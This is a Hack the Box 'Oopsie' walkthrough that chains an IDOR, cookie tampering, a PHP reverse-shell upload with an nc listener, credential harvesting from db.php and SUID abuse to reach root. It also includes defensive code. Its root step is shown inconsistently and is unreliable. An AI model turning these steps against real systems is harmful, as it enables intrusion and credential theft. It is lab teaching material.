#13 Oopsie - Starting Point - Hack the Box || Complete Walkthrough

Whenever you are performing a web assessment that includes authentication mechanisms, it is always advisable to check cookies and sessions and to try to figure out how access control really works.


Introduction

In many cases, Remote Code Execution and a foothold on the system are not achievable through a single vulnerability, but only after chaining several different vulnerabilities and exploits.


In this session, we are going to learn about Information Disclosure and Broken Access Control vulnerabilities. Even though they may not seem very important on their own, they can have a great impact when attacking a system, which is why even small vulnerabilities matter.


Pre-requisite

Before you start enumerating the target, install the tools used in this walkthrough: Nmap, Burp Suite (with the FoxyProxy browser extension), gobuster and Netcat.


Enumeration

Find the target IP by clicking on "Spawn Machine".


We are going to start our enumeration by searching for any open ports using the Nmap tool:

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.4.38
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-28 23:43 IST
Nmap scan report for 10.129.4.38
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.23 seconds
┌──(mrdev㉿mrdev)-[~]
└─$ 

We can spot port 22 (SSH) and port 80 (HTTP) as open. Visiting the IP in a web browser, we are presented with an automotive company website.

On the homepage, it is possible to locate interesting information about how one can access the services through login:

According to this information, the website should have a login page. Before we proceed with the directory and page enumeration, we can try to map the website by using the Burp Suite proxy to passively spider the website.

  • Learn More: 

Burp Suite Web Crawler, Scanner, Proxy, Intruder

This article explores the features of Burp Suite, a popular cybersecurity tool used for web application security testing. It covers its web crawler, scanner, proxy, and intruder functionalities, which are essential for identifying vulnerabilities and securing web applications.


Intercept the Web Data using Burpsuite

First, we start Burp Suite and configure the browser to send its traffic through the proxy. Navigate to the Proxy tab and, under the Intercept sub-tab, click the button that reads "Intercept is off" to turn interception on.

Now click on the Foxy Proxy extension, and Enable Burp Suite Proxy.

Now that everything is set up correctly, let's refresh the page in our browser, then switch to Burp Suite and forward the HTTP request.

Switch to the Target tab and then to the Site map option. It is possible to spot some directories and files that weren't visible while browsing. One that is indeed very interesting is the directory /cdn-cgi/login.

We can visit it in our browser and indeed we are presented with the login page:

We have no valid credentials to log in with, but there is also an option to log in as a Guest.

Trying that, we are presented with a couple of new navigation options now that we are logged in as Guest.

After navigating through the available pages, we spot that the only interesting one seems to be the Uploads. However, it is not possible to access it as we need to have super admin rights.

Now, we need to find a way to escalate our privileges from user Guest to super admin role. One way to try this is by checking if cookies and sessions can be manipulated.


Identifying Users via Intruder Attack with Burp Suite

Let's examine the portal further in Burp. We refresh the Accounts page, which displays the user ID for our current user, and intercept the request. We notice what seems to be a custom cookie implementation, consisting of a user value and a role. We also notice the id parameter, which for our current user is 2.

It might be possible to brute-force the ID values and display the user value for another user, such as the super admin account. We can do this using Burp's Intruder module. Press Ctrl+I to send the request to Intruder.

Click on Position and press Clear to remove the pre-populated payload positions:

Select the ID value (2) and click Add. Next, click on the Payloads tab:

We can generate a sequential list of 1 to 100 with a simple bash loop, for example in an online bash interpreter:

for i in `seq 1 100`; do echo $i; done

Paste the output into the payload box:

Next, click on the Options tab, ensure that Follow Redirections is set to " Always ", and select the option to " Process cookies in redirections ".

Now, click on the Target tab, and then click Start Attack. 

Sort responses by Length and view the results. A few of the responses have a different length, and we proceed to examine them. The super admin account is visible, and the corresponding user value is identified.


There are two admins that I have found by using the brute-forcing attack. After a try, I found that id 1 is admin and id 30 is super admin. I think there is a mistake with this machine. The upload is only possible with the admin with ID 1.

Let's try to access the Uploads page again, substituting our user value with the admin's:

It is possible to view and change cookies in Mozilla Firefox through the usage of Developer Tools. 

Developer tools are a set of web developer tools built into Firefox. You can use them to examine, edit, and debug HTML, CSS, and JavaScript.

In order to open the Developer Tools panel, we right-click on the content of the web page and select Inspect Element (Q).

Then we can navigate to the Storage section, where the cookies are shown. Indeed we have an information disclosure vulnerability that we might be able to abuse: we now know the access ID of the admin user, so we can change the values of our cookie through the Developer Tools so that the user value is 34322 and the role value is admin.

Then we can revisit the Uploads page.

We finally got access to the upload form.
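As an added illustration (not code from the box or from this walkthrough), here is the access-control pattern that the cookie edit above takes advantage of, next to a hardened version: the vulnerable check trusts the user and role values sent by the client, while the hardened one keeps the role server-side behind an opaque session token and also applies an object-level check to the id parameter that Intruder enumerated. The session store, the login() helper and the sample cookie strings are constructed for this example; the values 2 (the Guest account id) and 34322 (the admin user value) come from the walkthrough.

```python
import secrets
from http.cookies import SimpleCookie

# Constructed server-side session store: opaque token -> {"user": ..., "role": ...}
SESSIONS = {}


def login(user_id, role):
    """Issue an unguessable session token; the role is kept only on the server."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = {"user": user_id, "role": role}
    return token


def parse_cookie(header):
    """Turn a raw Cookie header (e.g. 'user=34322; role=admin') into a dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def can_upload_vulnerable(cookie_header):
    """Pattern seen on the box: the role is read straight from the cookie,
    so editing 'role=admin' in the browser's Storage panel is enough."""
    return parse_cookie(cookie_header).get("role") == "admin"


def session_for(cookie_header):
    """Resolve the cookie's session token against the server-side store."""
    return SESSIONS.get(parse_cookie(cookie_header).get("session", ""))


def can_upload(cookie_header):
    """Hardened: the cookie carries only a token; the role comes from the store."""
    sess = session_for(cookie_header)
    return sess is not None and sess["role"] == "admin"


def can_view_account(cookie_header, requested_id):
    """Object-level check for the Accounts page's id parameter: a user may
    view only their own record unless they hold the admin role."""
    sess = session_for(cookie_header)
    if sess is None:
        return False
    return sess["role"] == "admin" or sess["user"] == requested_id
```

With the hardened check, a forged or edited cookie never reaches a role decision, and enumerating id values with Intruder returns nothing for records that are not the caller's own.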


Foothold

Now that we have access to the upload form we can attempt to upload a PHP reverse shell. 


Establish Server Access Using PHP Reverse Shell

Instead of writing our own, we will use an existing one. You can find the code on GitHub:


PHP Reverse Shell

This repository contains a PHP script for generating a reverse shell. Reverse shells are commonly used in penetration testing and security assessments to gain remote access to a system. This PHP script can be used to establish a reverse shell connection to a target machine.


Copy this code and paste it to Notepad or Notepad++.


Now, modify the code to suit our needs. We change the listening host IP ($ip = {openVPN IP}) and the listening port ($port = 4444) variables to match our settings, and then we attempt to upload the file.

We finally managed to upload it. Now we might need to brute-force directories in order to locate the folder where the uploaded files are stored, but we can also guess it.

An uploads directory seems to be a logical assumption. We also confirm it by running gobuster:

┌──(mrdev㉿mrdev)-[~]
└─$ gobuster dir -u 10.129.4.38 -w dirbuster/directory-list-2.3-small.txt -x php 
===============================================================   
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
=============================================================== 
[+] Url:                     http://10.129.4.38 
[+] Method:                  GET  
[+] Threads:                 10
[+] Wordlist:                dirbuster/directory-list-2.3-small.txt    
[+] Negative Status codes:   404  
[+] User Agent:              gobuster/3.1.0   
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/12/29 00:09:07 Starting gobuster in directory enumeration mode  
=============================================================== 
/images               (Status: 301) [Size: 311] [--> http://10.129.4.38/images/]
/index.php            (Status: 200) [Size: 10932]  
/themes               (Status: 301) [Size: 311] [--> http://10.129.4.38/themes/] 
/uploads              (Status: 301) [Size: 312] [--> http://10.129.4.38/uploads/]   
Progress: 1040 / 175330 (0.59%)
^Z
[1]+  Stopped 

gobuster immediately found the /uploads directory. We don't have permission to list the directory, but we can still request our uploaded file directly. Before that, we need to set up a Netcat listener.

Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
D:\netcat-win32-1.11_1\netcat-1.11> nc -lvnp 4444
listening on [any] 4444 ...

Then request our shell through the browser ( http://{target IP}/uploads/php-reverse-shell.php ).

Go back to the Netcat listener and find out if the connection is established or not.

Note: In case our shell is not there it might have been deleted so we need to upload it again.

connect to [10.10.14.183] from (UNKNOWN) [10.129.4.38] 52408
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 
18:53:49 up 31 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

We got a reverse shell! To get a fully functional TTY, we can spawn one with python3 (a standard entry from any TTY upgrade cheat sheet):

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@oopsie:/$ whoami
whoami 
www-data
www-data@oopsie:/$

As the www-data user we can't achieve much, since that account has very restricted access to the system.

We can list the users on the system by reading the /etc/passwd file; any credentials we find later can then be tried against them in case of password reuse.

www-data@oopsie:/$ cat /etc/passwd 
cat /etc/passwd  
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 
syslog:x:102:106::/home/syslog:/usr/sbin/nologin 
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin 
apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin  
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false 
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash  
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false  
www-data@oopsie:/$

We found a new user named robert. The user flag can be found in the /home/robert directory.

www-data@oopsie:/$ cd /home/robert
cd /home/robert    
www-data@oopsie:/home/robert$ ls   
ls  user.txt
www-data@oopsie:/home/robert$ cat user.txt
cat user.txt
f2c74e*************************1
www-data@oopsie:/home/robert$

Since the website makes use of PHP and SQL, we can enumerate the web directory further for potential disclosures or misconfigurations. After some searching, we find some interesting PHP files under the /var/www/html/cdn-cgi/login directory.

www-data@oopsie:/home/robert$ cd ../../
cd ../../
www-data@oopsie:/$ ls  
ls
bin    dev   initrd.img      lib64       mnt   root  snap  tmp  vmlinuz
boot   etc   initrd.img.old  lost+found  opt   run   srv   usr  vmlinuz.old
cdrom  home  lib             media       proc  sbin  sys   var  
www-data@oopsie:/$ cd var/www/html/cdn-cgi/login
cd var/www/html/cdn-cgi/login
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls   
ls 
admin.php  db.php   index.php  script.js  
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php  
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$

Now that we got the password we can successfully log in:

www-data@oopsie:/var/www/html/cdn-cgi/login$ cd ../../../../../
cd ../../../../../ 
www-data@oopsie:/$ su robert
su robert
Password: M3g4C0rpUs3r!   
robert@oopsie:/$ whoami
whoami
robert
robert@oopsie:/$



Privilege Escalation

Before running any privilege escalation or enumeration script, let's check the basic commands for elevating privileges like sudo and id.

robert@oopsie:/$ sudo -l   
sudo -l
[sudo] password for robert: M3g4C0rpUs3r!  
Sorry, user robert may not run sudo on oopsie.
robert@oopsie:/$ id 
id 
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:/$

We observe that user robert is a member of the bugtracker group.


Exploiting Privilege Escalation Vulnerability in Bugtracker

Let's check whether there is any binary belonging to that group. We find a file named bugtracker, and check what permissions it has and what type of file it is.

robert@oopsie:/$ locate bugtracker  
locate bugtracker
/usr/bin/bugtracker 
robert@oopsie:/$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker    
ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), 
dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, 
BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
robert@oopsie:/$

The SUID bit is set on that binary, which is a promising exploitation path. Now we execute bugtracker and provide bug ID 2.

robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker      
------------------ 
: EV Bug Tracker : 
------------------  
Provide Bug ID: 2   
2    
---------------  
# whoami 
whoami
root    

As you can see we got root permissions. The root flag can be found in the /root folder.

# cd /root  
cd /root
# ls  
ls 
reports  root.txt    
# /bin/cat root.txt
/bin/cat root.txt
af1*************************acf 

We got both the flags, congratulations!
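As an added, defender-side illustration (not the box's bugtracker source, which this walkthrough does not show), here is how a privileged report reader can avoid the weakness behind Task 10: instead of handing a bare cat and a user-supplied ID to the shell, it validates the ID, resolves the path itself and reads the file without any helper, and if a helper is ever unavoidable it is run by absolute path with a fixed PATH. The /root/reports default is taken from the reports directory seen above; make_sample_reports() and the report contents are constructed for the example.

```python
import os
import subprocess
import tempfile

# Directory seen under /root in the walkthrough; overridable for testing.
DEFAULT_REPORTS_DIR = "/root/reports"


def read_report(bug_id, reports_dir=DEFAULT_REPORTS_DIR):
    """Return the report for bug_id, or None if the request is rejected.

    Weak pattern (Task 10): a setuid program runs something like
    `cat <dir>/<id>` through the shell, so whoever starts it controls
    which `cat` is found via PATH and what else lands on the command line.
    Hardened: no shell, no helper, an ASCII-digits-only ID and a path check.
    """
    if not (bug_id.isascii() and bug_id.isdigit()):  # rejects '../x', '2; id', ''
        return None
    base = os.path.realpath(reports_dir)
    path = os.path.realpath(os.path.join(base, bug_id))
    if os.path.dirname(path) != base:  # belt and braces: stay inside the dir
        return None
    try:
        with open(path, "r", encoding="utf-8") as fh:
            return fh.read()
    except OSError:  # missing or unreadable report
        return None


def run_helper(argv):
    """If an external helper is unavoidable: absolute path only, no shell,
    and a PATH the caller cannot influence. Returns None for a bad argv."""
    if not argv or not os.path.isabs(argv[0]):
        return None
    result = subprocess.run(argv, env={"PATH": "/usr/bin:/bin"}, shell=False,
                            capture_output=True, text=True, check=False)
    return result.stdout


def make_sample_reports():
    """Constructed fixture: a temporary reports dir holding bug report '2'."""
    d = tempfile.mkdtemp(prefix="reports-")
    with open(os.path.join(d, "2"), "w", encoding="utf-8") as fh:
        fh.write("Bug 2: constructed sample report\n")
    return d
```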


Task Answer


TASK 1: With what kind of tool can intercept web traffic?

Ans. proxy


TASK 2: What is the path to the directory on the web server that returns a login page?

Ans. /cdn-cgi/login

TASK 3: What can be modified in Firefox to get access to the upload page?

Ans. cookie

TASK 4: What is the access ID of the admin user?

Ans. 34322

TASK 5: On uploading a file, what directory does that file appear in on the server?

Ans. /uploads

TASK 6: What is the file that contains the password that is shared with the robert user?

Ans. db.php

TASK 7: What executable is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?

Ans. find

TASK 8: Regardless of which user starts running the bugtracker executable, what's user privileges will be used to run?

Ans. root


TASK 9: What SUID stands for?

Ans. Set owner User ID


TASK 10: What is the name of the executable being called in an insecure manner?

Ans. cat
